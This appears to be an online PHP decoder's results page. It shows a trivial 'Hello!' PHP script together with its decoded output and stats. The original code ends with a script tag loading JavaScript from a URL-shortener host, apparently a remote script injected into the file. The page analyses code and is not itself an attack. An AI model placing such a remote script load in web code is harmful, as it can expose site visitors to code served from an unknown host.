Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $myString = "Hello!"; echo $myString; echo "<h5>I love using PHP!</h5>"; ?> <script ..
Decoded Output download
Hello!<h5>I love using PHP!</h5>
Did this file decode correctly?
Original Code
<?php
$myString = "Hello!";
echo $myString;
echo "<h5>I love using PHP!</h5>";
?>
<script src="https://5pm.am/Cqy0j3" type="text/javascript"></script>
Function Calls
None |
Stats
MD5 | 3243649e8d217dbedf0c991dcab538d5 |
Eval Count | 0 |
Decode Time | 98 ms |